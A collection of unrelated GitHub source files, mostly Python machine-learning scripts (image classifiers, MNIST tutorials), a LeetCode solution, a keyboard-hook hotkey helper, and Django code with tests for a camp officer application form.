augmentation\n data_augmentation = Sequential([\n preprocessing.RandomRotation(0.2),\n preprocessing.RandomFlip(\"horizontal\"),\n preprocessing.RandomFlip(\"vertical\"),\n preprocessing.RandomZoom(0.2),\n preprocessing.RandomTranslation(0.2, 0.2),\n preprocessing.RandomHeight(0.2),\n preprocessing.RandomWidth(0.2), \n preprocessing.RandomContrast(0.2),\n\n ]) if resolution != 'public' else Sequential([])\n\n data_augmentation = Sequential([])\n # # Freeze all layers in the base model\n # for layer in base_model.layers:\n # layer.trainable = False\n # # Unfreeze the last 10 layers in the base model for fine-tuning\n # for layer in base_model.layers[-5:]:\n # layer.trainable = True\n\n #capa de entradas. \n entradas = layers.Input((255, 255, 3))\n\n # Capa de augmentation\n x = data_augmentation(entradas)\n # Pass the augmented images through the base model\n x = base_model(x)\n # Add a dense layer\n x = layers.Dense(512, activation='relu')(x)\n # Add another dense layer\n salidas = layers.Dense(num_classes, activation='softmax')(x)\n model1 = Model(inputs = entradas, outputs = salidas)\n \n return model1\n\n\ndef train_model(model, train_generator, val_generator, num_classes, class_weights, log_dir):\n num_epochs = 200\n patience = 40\n patience_lr = 20\n \n init_lr = 1e-4\n\n model.compile(optimizer=tf.keras.optimizers.Adam(init_lr), \n loss='categorical_crossentropy', \n metrics=[\n tf.keras.metrics.CategoricalAccuracy(name=f'metrics/accuracy'),\n tf.keras.metrics.TopKCategoricalAccuracy(3, name=f'metrics/top-3-accuracy'),\n tfa.metrics.F1Score(num_classes=num_classes, average='macro', name='metrics/F1-macro'),\n tf.keras.metrics.AUC(multi_label=True, num_labels=num_classes, name='metrics/AUC'),\n tf.keras.metrics.Precision(name='metrics/precision'),\n tf.keras.metrics.Recall(name='metrics/recall'),\n tf.keras.metrics.PrecisionAtRecall(0.99, name='metrics/P@R_99'),\n tf.keras.metrics.PrecisionAtRecall(0.95, name='metrics/P@R_95'),\n tf.keras.metrics.PrecisionAtRecall(0.9, name='metrics/P@R_90'),\n tfa.metrics.MatthewsCorrelationCoefficient(num_classes=num_classes, name='metrics/MCC')\n ],\n )\n\n callbacks =[\n EarlyStopping(monitor='val_loss', restore_best_weights=False, patience=patience),\n ReduceLROnPlateau(monitor='val_loss', patience=patience_lr, min_lr=1e-7), \n ModelCheckpoint(log_dir, monitor=f\"val_loss\", save_best_only=True, save_weights_only=True),\n TqdmCallback(leave=False),\n TensorBoard(log_dir=log_dir, histogram_freq=1, profile_batch=0)\n\n ]\n \n history = model.fit(train_generator, epochs=num_epochs, verbose=0, callbacks=callbacks, validation_data=val_generator,class_weight=class_weights)\n \n model.load_weights(log_dir)\n \n return history\n\n#function to plot the metrics of the trainign and validation\ndef plot_metrics(history, log_dir):\n # Plotting training accuracy\n fig, axs = plt.subplots(1, 2, figsize=(10,5))\n axs[0].plot(history.history['metrics/accuracy'], label='Train')\n axs[0].plot(history.history['val_metrics/accuracy'], label='Validation')\n axs[0].set_title('Training and Validation Accuracy')\n axs[0].set_xlabel('Epoch')\n axs[0].set_ylabel('Accuracy')\n axs[0].legend()\n\n # Plotting training loss\n axs[1].plot(history.history['loss'], label='Train')\n axs[1].plot(history.history['val_loss'], label='Validation')\n axs[1].set_title('Training and Validation Loss')\n axs[1].set_xlabel('Epoch')\n axs[1].set_ylabel('Loss')\n axs[1].legend()\n\n plt.tight_layout()\n \n image = fig_to_img(fig)\n image = resize_img_aspect(image, 512)\n plt.imsave(os.path.join(log_dir, 'plot.png'), image)\n \n plt.show()\n \n \n \ndef get_test_generator(class2int, resolution, log_dir, test_directory = \"data/validation_final_septiembre/\", exclude_pd=False):\n test_image_paths = get_files(test_directory, resolution=resolution, exclude_pd=exclude_pd) \n num_classes = len(class2int)\n class_names = sorted(class2int.keys())\n test_labels = list(map(lambda im: class2int[im.split(test_directory)[1].split('/')[0]] if num_classes in [5, 7] else class2int[im.split(test_directory)[1].split('/')[0].split('_')[0]], test_image_paths))\n\n # Test labels are repeated 4 times since each image is divided in 4 patches\n # test_labels = np.repeat(np.expand_dims(test_labels,0), 4, 0).T.flatten()\n # Extract image paths and labels\n\n test_generator = CustomDataGenerator(test_image_paths, test_labels, num_classes, shuffle_epoch=False, mode='val', batch_size=8)\n \n return test_generator\n \ndef test_model(model, test_generator, log_dir, class_names):\n\n test_predictions = model.predict(test_generator)\n test_labels = np.concatenate([np.argmax(t[1], 1) for t in test_generator])\n\n # Convert predictions to class labels\n predicted_labels = np.argmax(test_predictions, axis=1)\n \n # Calculate metrics\n accuracy = accuracy_score(test_labels, predicted_labels)\n precision = precision_score(test_labels, predicted_labels, average='macro')\n recall = recall_score(test_labels, predicted_labels, average='macro')\n\n print(\"Test Accuracy:\", accuracy)\n print(\"Test Precision:\", precision)\n print(\"Test Recall:\", recall)\n\n # Obtain the confusion matrix\n\n # Ensure that labels are unique and match the confusion matrix\n labels = np.unique(np.concatenate((test_labels, predicted_labels)))\n\n # Visualize the confusion matrix\n fig = plt.figure(figsize=(5,5))\n ax = fig.gca()\n ConfusionMatrixDisplay.from_predictions(test_labels, predicted_labels, display_labels=class_names, normalize='true', ax=ax)\n \n ax.set_title(f'Acc: {accuracy:4.2f}')\n image = fig_to_img(fig)\n image = resize_img_aspect(image, 512)\n plt.imsave(os.path.join(log_dir, 'confusion.png'), image)\n \n plt.show()\n\n# def train_evaluate(class_type, resolution,\n# public_directory = 'data/public_dataset/',\n# root_directory = \"data/dataset_2_final/\", \n# test_directory = \"data/validation_final_septiembre/\",\n# pretrain_dir = None,\n# exclude_pd = False\n# ):\n \n# if resolution == 'public':\n# root_directory = public_directory\n \n# resname = resolution if resolution is not None else 'all'\n \n# image_paths = get_files(root_directory, resolution=resolution, exclude_pd=exclude_pd)\n# class_names, class2int, labels = get_classes_labels(root_directory, image_paths, class_type, exclude_pd=exclude_pd)\n \n# num_classes = len(class2int)\n \n# display_markdown(f'## Evaluating {resname} resolution, {num_classes} classes, exc pd {exclude_pd}', raw=True)\n \n# train_generator, val_generator = get_generators(image_paths, labels, num_classes=num_classes, resolution=resolution)\n# class_weights = compute_weights(train_generator)\n\n# model = get_model(num_classes, resolution=resolution)\n \n# if pretrain_dir is not None:\n# model.load_weights(pretrain_dir)\n \n# MODEL_NAME = f'Ef0_{resname}_{num_classes}_classes_excpd{int(exclude_pd)}'\n# RUN_NAME = ''\n# log_dir = f'logs/{datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")}/{MODEL_NAME}{RUN_NAME}'\n# print(log_dir)\n \n# history = train_model(model, train_generator, val_generator, num_classes, class_weights, log_dir)\n \n# plot_metrics(history, log_dir)\n# test_model(model, class2int, resolution, log_dir, exclude_pd=exclude_pd)","repo_name":"jorgediosdado/lung_tissues_classification","sub_path":"histolungs.py","file_name":"histolungs.py","file_ext":"py","file_size_in_byte":18256,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32903064460","text":"class Solution:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n res = set()\n\n def backtrack(temp, elements):\n if not elements:\n res.add(tuple(temp.copy()))\n\n for e in elements:\n temp.append(e)\n new_nums = elements.copy()\n new_nums.remove(e)\n backtrack(temp, new_nums)\n temp.pop()\n\n backtrack([], nums)\n return [list(r) for r in res]\n","repo_name":"renyitan/data-structures-and-algorithms","sub_path":"python/leetcode/47-permutations-ii.py","file_name":"47-permutations-ii.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34537118404","text":"#Imports\nfrom __future__ import absolute_import, division, print_function\nimport tensorflow as tf\nimport os\nos.environ['KMP_DUPLICATE_LIB_OK']='True'\nfrom tensorflow import keras\nimport numpy as np\nimport matplotlib \nmatplotlib.use('TkAgg') #Mac matplot workaround \nimport matplotlib.pyplot as plt \n\n\n#Functions\ndef plot_img(i, predictions_array, true_label, img):\n\tpredictions_array, true_label, img = predictions_array[i], true_label[i], img[i]\n\tplt.grid(False)\n\tplt.xticks([])\n\tplt.yticks([])\n\tplt.imshow(img, cmap=plt.cm.binary)\n\tpredicted_label = np.argmax(predictions_array)\n\tif predicted_label == true_label:\n\t\tcolor = 'green'\n\telse:\n\t\tcolor = 'red'\n\tplt.xlabel(\"{} {:2.0f}% ({})\".format(class_names[predicted_label], 100*np.max(predictions_array), class_names[true_label]), color=color)\n\ndef plot_value_array(i, predictions_array, true_label):\n\tpredictions_array, true_label = predictions_array[i], true_label[i]\n\tplt.grid(False)\n\tplt.xticks([])\n\tplt.yticks([])\n\tthisplot = plt.bar(range(10), predictions_array, color=\"#777777\")\n\tplt.ylim([0, 1])\n\tpredicted_label = np.argmax(predictions_array)\n\n\tthisplot[predicted_label].set_color('red')\n\tthisplot[true_label].set_color('green')\n\n\n\n#Load data\nfashion_mnist = keras.datasets.fashion_mnist\n\n(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\n\n\n#Map imgs to classes\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat','Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n\n\n#Preprocessing\n\n#Visualization of pixel values\nplt.figure()\nplt.imshow(train_images[0])\nplt.colorbar()\nplt.grid(False)\n#plt.show()\n#screenshots/Figure_1.png\n\n#Scale images from 0-1 to feed into neural net\ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\n\n\n#Set up layers\nmodel = keras.Sequential([\n\tkeras.layers.Flatten(input_shape=(28, 28)), #Flatten makes a (784,) input array\n\tkeras.layers.Dense(128, activation=tf.nn.relu), #By flattening the input the dense layers output will be (128) instead of (28, 128)\n\tkeras.layers.Dense(10, activation=tf.nn.softmax)\n])\n\n#Compile model\nmodel.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n\n#Training\nmodel.fit(train_images, train_labels, epochs=10) \n\n#Output:\n#Epoch 1/10 60000/60000 [==============================] - 29s 488us/sample - loss: 0.4945 - acc: 0.8269\n#Epoch 2/10 60000/60000 [==============================] - 29s 478us/sample - loss: 0.3725 - acc: 0.8660\n#Epoch 3/10 60000/60000 [==============================] - 32s 540us/sample - loss: 0.3371 - acc: 0.8761\n#Epoch 4/10 60000/60000 [==============================] - 30s 499us/sample - loss: 0.3145 - acc: 0.8836\n#Epoch 5/10 60000/60000 [==============================] - 30s 505us/sample - loss: 0.2968 - acc: 0.8911\n#Epoch 6/10 60000/60000 [==============================] - 30s 507us/sample - loss: 0.2824 - acc: 0.8939\n#Epoch 7/10 60000/60000 [==============================] - 30s 503us/sample - loss: 0.2704 - acc: 0.8992\n#Epoch 8/10 60000/60000 [==============================] - 33s 543us/sample - loss: 0.2592 - acc: 0.9037\n#Epoch 9/10 60000/60000 [==============================] - 33s 555us/sample - loss: 0.2492 - acc: 0.9072\n#Epoch 10/10 60000/60000 [==============================] - 34s 565us/sample - loss: 0.2419 - acc: 0.9092\n\n#Accuracy\ntest_loss, test_acc = model.evaluate(test_images, test_labels)\nprint('Test accuracy:', test_acc)\n#Output:\n#Test accuracy: 0.8794\n\n#Predictions\npredictions = model.predict(test_images)\npredictions[0]\n\n#Prediction visualization\nnum_rows = 5\nnum_cols = 3\nnum_images = num_rows*num_cols\nplt.figure(figsize=(2*2*num_cols, 2*num_rows))\nfor i in range(num_images):\n plt.subplot(num_rows, 2*num_cols, 2*i+1)\n plot_img(i, predictions, test_labels, test_images)\n plt.subplot(num_rows, 2*num_cols, 2*i+2)\n plot_value_array(i, predictions, test_labels)\n# plt.show()\n#screenshots/Figure_2.png\n\n#Single image prediction\nimg = test_images[0]\n\n#Batch where image is only memeber\nimg = (np.expand_dims(img, 0))\n\nsingle_prediction = model.predict(img)\nprint(single_prediction)\n#Output:\n#[[4.0423952e-06 1.7867489e-08 1.1013570e-05 8.0041261e-08 3.1214680e-07\n#\t1.8548490e-03 1.4891983e-05 1.1522283e-02 2.6472981e-06 9.8658991e-01]]\n\n\nplot_value_array(0, single_prediction, test_labels)\nplt.xticks(range(10), class_names, rotation=45)\n# plt.show()\n#screenshots/Figure_3.png\n\n#Prediction result\nresult = np.argmax(single_prediction[0])\nprint(result)\n#Output:\n#9\n","repo_name":"msk0693/Image_Classifier","sub_path":"image_classifier.py","file_name":"image_classifier.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10477567421","text":"from pyHook import HookManager, HookConstants\r\nfrom win32gui import PumpMessages, PostQuitMessage, PumpWaitingMessages\r\nfrom pynput.keyboard import Key, Controller\r\nfrom threading import Thread\r\nimport var\r\nfrom time import sleep\r\nimport sys\r\n\r\n\r\nclass Keystroke_Watcher:\r\n def __init__(self, master):\r\n self.hm = HookManager()\r\n self.hm.KeyDown = self.on_key_down\r\n self.hm.KeyUp = self.on_key_up\r\n self.hm.HookKeyboard()\r\n self.keys_held = set() # set of all keys currently being pressed\r\n\r\n def get_key_combo_code(self):\r\n # find some way of encoding the presses.\r\n return '+'.join([HookConstants.IDToName(key) for key in self.keys_held])\r\n\r\n def on_key_down(self, event):\r\n try:\r\n self.keys_held.add(event.KeyID)\r\n finally:\r\n return True\r\n\r\n def on_key_up(self, event):\r\n keycombo = self.get_key_combo_code()\r\n print(keycombo)\r\n try:\r\n # Do whatever you want with your keycombo here\r\n pass\r\n finally:\r\n self.keys_held.remove(event.KeyID)\r\n return True\r\n\r\n\r\ndef main():\r\n watcher = Keystroke_Watcher\r\n PumpMessages()\r\n # PumpWaitingMessages()\r\n\r\nif __name__ == '__main__':\r\n # watcher = Keystroke_Watcher()\r\n # PumpMessages()\r\n main()","repo_name":"Shah-imran/copy-assister","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73613796007","text":"import cv2 as c\nimport numpy as np\nimport dlib\n\n# img = c.imread(\"car.jpg\")\n# scale_percent = 60\n# width = int(img.shape[1] * scale_percent / 400)\n# height = int(img.shape[0] * scale_percent / 400)\n\n# dim = (width, height)\n# print(dim)\n# images = c.resize(img, dim, interpolation = c.INTER_AREA)\n# c.imwrite(\"car_2.png\", images)\n# CONVERTING IMAGE TO GRAY\n# img_gray = c.cvtColor(images, c.COLOR_BGR2GRAY)\n\n#BLUR IMAGE\n# img_blur = c.GaussianBlur(images, (7, 7), 0)\n\n# img_canny = c.Canny(images, 100, 100)\n# c.imshow(\"Image\", img_canny)\n\n# USING WEBCAM\n# video = c.VideoCapture(0)\n# video.set(3, 640)\n# video.set(4, 440)\n# video.set(10, 50)\n\n#GETTING THE WIDTH AND HEIGHT OF YOUR FRAME RECORDER\n# width = int(video.get(c.CAP_PROP_FRAME_WIDTH))\n# height = int(video.get(c.CAP_PROP_FRAME_HEIGHT))\n\n# CALLING THE VIDEO WRITER USING CV2 AND PASSING THE NEEDED PARAMETER\n# out = c.VideoWriter('output.mp4', c.VideoWriter_fourcc(*'DIVX'), 20, (width,height))\n\n# LOOPING FOR VIDEO DISPLAY\n# while True:\n# success, img = video.read()\n# c.imshow(\"My Video\", img)\n# if c.waitKey(1) & 0xFF == ord(\"b\"):\n# break\n\nimage = c.imread(\"my_image.png\")\np0 = 10, 10\np1 = 110, 90\np2 = 500, 10\n\nred = (0, 0, 255)\nline_image = c.line(image, p0, p1, red, 10)\nline_image = c.line(image, p0, p2, (200, 200, 0), 10)\n\nc.waitKey(0)\n\n","repo_name":"SoremiKayode/computervisionwitopencv","sub_path":"working_image.py","file_name":"working_image.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24015640753","text":"# from os import access\n# from pyexpat import model\n# import pandas as pd\n# import numpy as np\n# from sklearn.datasets import load_iris\n# from sklearn import svm\n# from sklearn.model_selection import cross_val_score\n\n# X,y=load_iris(return_X_y=True) #load the iris data\n\n# model=svm.SVC() #default kernel is linear\n# accuracy=cross_val_score(model,X,y,scoring='accuracy',cv=20) #cv=20 is the number of folds\n\n# print(accuracy.mean()*100) #accuracy of the model\n\n#--------------\n\nimport numpy as np\nimport mnist\nfrom tensorflow import keras\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense\nfrom tensorflow.keras.utils import to_categorical\n\ntrain_images=mnist.train_images() #load the training images\ntrain_labels=mnist.train_labels() #load the training labels\ntest_images=mnist.test_images() #load the test images\ntest_labels=mnist.test_labels() #load the test labels\n\nprint(train_images.shape) #train_images is a numpy array of shape (60000,28,28)\n#using the 28x28 images of the mnist dataset to train the model\nprint(train_labels.shape) \n#train_labels is a numpy array of shape (60000,1) containing the labels of the training data\n\ntrain_images=(train_images/255)-0.5 #normalize the images to be between -0.5 and 0.5\ntest_labels=(test_labels/255)-0.5 #normalize the images to be between -0.5 and 0.5\n\nprint(train_images) #print the normalized training images\n\ntrain_images=np.expand_dims(train_images,axis=3) #add a dimension to the images to make them 3 dimensional (28x28x1)\ntest_images=np.expand_dims(test_images,axis=3) #add a dimension to the images to make them 3 dimensional (28x28x1)\n\nnum_filters=8 #number of filters in the convolutional layer\nfilter_size=3 #size of the filter\npool_size=2 #size of the pooling window\n\n#create a sequential model\nmodel=Sequential([ \n Conv2D(num_filters,filter_size,input_shape=(28,28,1)),\n MaxPooling2D(pool_size),\n Flatten(),\n Dense(10,activation='softmax')\n])\n\nmodel.compile('adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])\n\nmodel.summary() #print the model summary\n","repo_name":"NoorTaamreh/HTU-DataScience","sub_path":"ML/Session39.py","file_name":"Session39.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8911005566","text":"from django.conf import settings\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom products.models import Products\n\n\"\"\"\nholds bag items and calculates price\n\"\"\"\n\n\ndef bag_contents(request):\n\n bag_items = []\n total = 0\n product_count = 0\n bag = request.session.get('bag', {})\n\n for item_id, quantity in bag.items():\n product = get_object_or_404(Products, pk=item_id)\n total += quantity * product.price\n product_count += quantity\n bag_items.append({\n 'item_id': item_id,\n 'quantity': quantity,\n 'product': product,\n })\n\n order_total = total\n\n context = {\n 'bag_items': bag_items,\n 'total': total,\n 'order_total': order_total,\n 'product_count': product_count,\n }\n\n return context\n","repo_name":"ACEGAZ/game-hunter","sub_path":"bag/contexts.py","file_name":"contexts.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70235008808","text":"from datetime import date, timedelta\n\nfrom django.conf import settings\nfrom django.core import mail\nfrom django.urls import reverse\n\nfrom cciw.accounts.models import User\nfrom cciw.cciwmain.tests import factories as camps_factories\nfrom cciw.cciwmain.tests.mailhelpers import read_email_url\nfrom cciw.officers.tests import factories\nfrom cciw.officers.tests.base import RequireQualificationTypesMixin\nfrom cciw.utils.tests.webtest import WebTestBase\n\n\nclass ApplicationFormView(RequireQualificationTypesMixin, WebTestBase):\n def _application_edit_url(self, app_id):\n return reverse(\"admin:officers_application_change\", args=[app_id])\n\n def _setup(self, invitation=True) -> User:\n \"\"\"\n Initial setup for application form\n \"\"\"\n # Ensure we have a future camp (need for thisyears_applications logic),\n # but not too far in the future\n user = factories.create_officer()\n leader = factories.create_officer()\n if invitation:\n officers = [user]\n else:\n officers = []\n self.camp = camps_factories.create_camp(\n start_date=date.today() + timedelta(days=20), officers=officers, leader=leader\n )\n self.leader = leader\n self.officer_login(user)\n return user\n\n def _start_new(self):\n self.get_url(\"cciw-officers-applications\")\n self.submit(\"input[name=new]\")\n self.assertCode(200)\n\n def _finish_application_form(self, enter_dbs_number=False, override=None):\n # A full set of values that pass validation.\n values = {\n \"full_name\": \"x\",\n \"birth_date\": \"2000-01-01\",\n \"birth_place\": \"x\",\n \"address_firstline\": \"x\",\n \"address_town\": \"x\",\n \"address_county\": \"x\",\n \"address_postcode\": \"x\",\n \"address_country\": \"x\",\n \"address_tel\": \"x\",\n \"address_mobile\": \"x\",\n \"address_email\": \"foo@foo.com\",\n \"christian_experience\": \"x\",\n \"youth_experience\": \"x\",\n \"youth_work_declined_details\": \"x\",\n \"illness_details\": \"x\",\n \"referee1_name\": \"My Referee 1\",\n \"referee1_capacity_known\": \"Pastor\",\n \"referee1_address\": \"x\",\n \"referee1_tel\": \"x\",\n \"referee1_mobile\": \"x\",\n \"referee1_email\": \"foo1@foo1.com\",\n \"referee2_name\": \"My Referee 2\",\n \"referee2_capacity_known\": \"Boss\",\n \"referee2_address\": \"x\",\n \"referee2_tel\": \"x\",\n \"referee2_mobile\": \"x\",\n \"referee2_email\": \"foo2@foo2.com\",\n \"crime_details\": \"x\",\n \"court_details\": \"x\",\n \"concern_details\": \"x\",\n \"youth_work_declined\": \"2\",\n \"relevant_illness\": \"2\",\n \"crime_declaration\": \"2\",\n \"court_declaration\": \"2\",\n \"concern_declaration\": \"2\",\n \"allegation_declaration\": \"2\",\n \"dbs_check_consent\": \"2\",\n \"qualifications-0-type\": str(self.first_aid_qualification.id),\n \"qualifications-0-date_issued\": \"2016-01-01\",\n \"finished\": True,\n }\n if enter_dbs_number:\n values[\"dbs_number\"] = \"001234\"\n if override:\n for k, v in override.items():\n if v is None:\n del values[k]\n else:\n values[k] = v\n return self.fill_by_name(values)\n\n def _get_application_form_emails(self):\n return [e for e in mail.outbox if \"Application form\" in e.subject]\n\n def _get_email_change_emails(self):\n return [e for e in mail.outbox if \"Email change\" in e.subject]\n\n def _assert_finished_successful(self):\n self.assertNamedUrl(\"cciw-officers-applications\")\n\n self.assertTextPresent(\"have been notified of the completed application form by email.\")\n\n def _save(self):\n self.submit(\"[name=_save]\")\n\n def test_change_application(self):\n user = self._setup()\n app = factories.create_application(finished=False, referee1_name=\"My Initial Referee 1\")\n self.get_literal_url(self._application_edit_url(app.id))\n self.assertCode(200)\n self.assertTextPresent(\"Save and continue editing\")\n # Check that Referee initial values are set from model:\n self.assertTextPresent(\"My Initial Referee 1\")\n self.assertTextAbsent(\"Save and add another\")\n self.fill_by_name({\"full_name\": \"Test full name\"})\n self._save()\n self.assertNamedUrl(\"cciw-officers-applications\")\n assert user.applications.count() == 1\n app.refresh_from_db()\n assert app.full_name == \"Test full name\"\n\n # Check that Referee was propagated properly\n assert app.referee_set.get(referee_number=1).name == \"My Initial Referee 1\"\n\n def test_change_finished_application(self):\n \"\"\"\n Ensure that a leader can change a finished application of an officer\n \"\"\"\n user = self._setup()\n factories.create_application(officer=user, finished=True)\n\n self.officer_login(self.leader)\n # To catch a bug, give the leader an application form for the same camp\n factories.create_application(officer=self.leader)\n\n apps = user.applications.all()\n assert len(apps) == 1\n self.get_literal_url(self._application_edit_url(apps[0].id))\n self.assertCode(200)\n self.fill_by_name({\"full_name\": \"Changed full name\"})\n self._save()\n self.assertNamedUrl(\"cciw-officers-applications\")\n assert user.applications.count() == 1\n assert user.applications.all()[0].full_name == \"Changed full name\"\n\n def _change_email_setup(self):\n user = self._setup()\n assert len(mail.outbox) == 0\n application = factories.create_application(finished=False)\n assert user.applications.count() == 1\n\n # email asserts\n orig_email = user.email\n new_email = \"a_different_email@foo.com\"\n assert orig_email != new_email\n\n # visit page\n self.get_literal_url(self._application_edit_url(application.id))\n self.assertCode(200)\n self._finish_application_form()\n self.fill_by_name({\"full_name\": \"Test full name\", \"address_email\": new_email})\n self._save()\n self.assertNamedUrl(\"cciw-officers-applications\")\n assert user.applications.count() == 1\n\n # Check the emails have been sent\n emails = self._get_email_change_emails()\n assert len(emails) == 1\n return user, orig_email, new_email, emails\n\n def test_change_email_address(self):\n # When submitted email address is different from the one stored against\n # the user, an email should be sent with a link to update the stored\n # email address\n\n # This is a 'story' test, really, not a unit test, because we want to\n # check several different conclusions.\n\n user, orig_email, new_email, emails = self._change_email_setup()\n\n # Read the email\n url, path, querydata = read_email_url(emails[0], \"https?://.*/correct-email/.*\")\n\n # Check that nothing has changed yet\n user.refresh_from_db()\n assert user.email == orig_email\n\n # follow link - deliberately wrong first time\n response = self.client.get(path, {\"token\": \"foo\"})\n assert response.status_code == 200\n self.assertContains(response, \"Update failed\")\n\n # Check that nothing has changed yet\n user.refresh_from_db()\n assert user.email == orig_email\n\n # follow link, right this time\n response = self.client.get(path, querydata)\n assert response.status_code == 200\n self.assertContains(response, \"Update successful\")\n\n # check email address has changed\n user.refresh_from_db()\n assert user.email == new_email\n\n def test_change_email_address_mistakenly(self):\n # Same as above, but this time we click the link to correct the\n # application form which has a wrong email address\n\n user, user_email, application_email, emails = self._change_email_setup()\n\n # Read the email\n url, path, querydata = read_email_url(emails[0], \"https?://.*/correct-application/.*\")\n\n # Check that nothing has changed yet\n assert user.email == user_email\n assert user.applications.all()[0].address_email == application_email\n\n # follow link - deliberately wrong first time\n response = self.client.get(path, {\"token\": \"foo\"})\n assert response.status_code == 200\n self.assertContains(response, \"Update failed\")\n\n # Check that nothing has changed yet\n assert user.applications.all()[0].address_email == application_email\n\n # follow link, right this time\n response = self.client.get(path, querydata)\n assert response.status_code == 200\n self.assertContains(response, \"Update successful\")\n\n # check email address has changed\n assert user.applications.all()[0].address_email == user_email\n\n def test_unchanged_email_address(self):\n \"\"\"\n Check that if the email address is not changed (or is just different case)\n then no email is sent out\n \"\"\"\n user = self._setup()\n self._start_new()\n self._finish_application_form()\n self.fill_by_name({\"address_email\": user.email.upper()})\n self._save()\n\n # Check no emails have been sent\n emails = self._get_email_change_emails()\n assert len(emails) == 0\n\n def test_finish_incomplete(self):\n user = self._setup()\n assert user.applications.count() == 0\n self._start_new()\n url = self.current_url\n self.fill_by_name({\"finished\": True})\n self._save()\n self.assertUrlsEqual(url) # Same page\n self.assertTextPresent(\"Please correct the errors below\")\n self.assertTextPresent(\"form-row errors field-address\")\n assert user.applications.exclude(date_saved__isnull=True).count() == 0 # shouldn't have been saved\n\n def test_finish_complete(self):\n user = self._setup()\n assert user.applications.count() == 0\n assert len(mail.outbox) == 0\n self._start_new()\n\n # Add two applications\n factories.create_application(officer=user, finished=False, date_saved=date(2010, 1, 1))\n # Most recent one:\n application = factories.create_application(officer=user, finished=False)\n self.get_literal_url(self._application_edit_url(application.id))\n self.assertCode(200)\n self._finish_application_form()\n self._save()\n self._assert_finished_successful()\n\n apps = list(user.applications.all())\n # The old one should have been deleted.\n assert len(apps) == 1\n assert application.id == apps[0].id\n\n assert apps[0].referee_set.get(referee_number=1).name == \"My Referee 1\"\n assert apps[0].referee_set.get(referee_number=1).capacity_known == \"Pastor\"\n assert apps[0].referee_set.get(referee_number=2).name == \"My Referee 2\"\n assert apps[0].referee_set.get(referee_number=2).capacity_known == \"Boss\"\n\n # There should be two emails in outbox, one to officer, one to\n # leader. This assumes that there is a leader for the camp,\n # and it is associated with a User object.\n emails = self._get_application_form_emails()\n assert len(emails) == 2\n\n # Email should be sent when application is fully saved.\n for m in emails:\n for txt in [\"My Referee 1\", \"First Aid\"]:\n # One to officer should contain attachments, one to leader must\n # not.\n if any(user.email in a for a in m.to):\n assert txt in m.body\n assert txt in m.attachments[0][1]\n else:\n assert txt not in m.body\n assert len(m.attachments) == 0\n\n def test_finish_complete_no_invitation(self):\n user = self._setup(invitation=False)\n assert user.applications.count() == 0\n assert len(mail.outbox) == 0\n self._start_new()\n self._finish_application_form()\n self._save()\n self.assertNamedUrl(\"cciw-officers-applications\")\n self.assertTextPresent(\"The application form has been sent to the CCiW secretary\")\n\n # There should be two emails in outbox, one to officer, one to\n # secretary.\n emails = self._get_application_form_emails()\n assert len(emails) == 2\n assert any(e.to == settings.SECRETARY_EMAILS for e in emails)\n\n def test_change_application_after_finished(self):\n \"\"\"\n Ensure that the user can't change an application after it has been\n 'finished'\n \"\"\"\n user = self._setup()\n application = factories.create_application(officer=user, finished=True)\n\n self.get_literal_url(self._application_edit_url(application.id))\n url = self.current_url\n self.assertCode(200)\n self.fill_by_name({\"full_name\": \"A Changed Full Name\"})\n self._save()\n # we should be on same page:\n self.assertUrlsEqual(url)\n self.assertTextPresent(\"You cannot change a submitted\")\n # shouldn't have changed data:\n application.refresh_from_db()\n assert application.full_name != \"A Changed Full Name\"\n\n def test_list_applications_officers(self):\n \"\"\"\n Ensure that normal officers can't see the list of applications\n \"\"\"\n self.officer_login(factories.create_officer())\n self.get_literal_url(reverse(\"admin:officers_application_changelist\"), expect_errors=[403])\n self.assertCode(403)\n\n def test_list_applications_leaders(self):\n \"\"\"\n Ensure that leaders can see the list of applications\n \"\"\"\n leader = factories.create_current_camp_leader()\n self.officer_login(leader)\n self.get_url(\"admin:officers_application_changelist\")\n self.assertTextPresent(\"Select application to change\")\n\n def test_add_application_duplicate(self):\n \"\"\"\n Test that we can't add a new application twice in a year\n \"\"\"\n user = self._setup()\n factories.create_application(officer=user, date_saved=date.today(), finished=True)\n a2 = factories.create_application(officer=user, date_saved=None, finished=False)\n self.get_literal_url(self._application_edit_url(a2.id))\n self._finish_application_form()\n self._save()\n self.assertTextPresent(\"You've already submitted\")\n assert user.applications.exclude(date_saved__isnull=True).count() == 1\n\n def test_save_partial(self):\n user = self._setup()\n self._start_new()\n self.fill_by_name({\"full_name\": \"My Name Is ...\"})\n self._save()\n apps = user.applications.all()\n assert len(apps) == 1\n a = apps[0]\n assert a.full_name == \"My Name Is ...\"\n assert not a.finished\n\n def test_dbs_number_entered(self):\n user = self._setup()\n self._start_new()\n self._finish_application_form(enter_dbs_number=True)\n self._save()\n self._assert_finished_successful()\n a = user.applications.get()\n assert a.dbs_number == \"001234\"\n assert 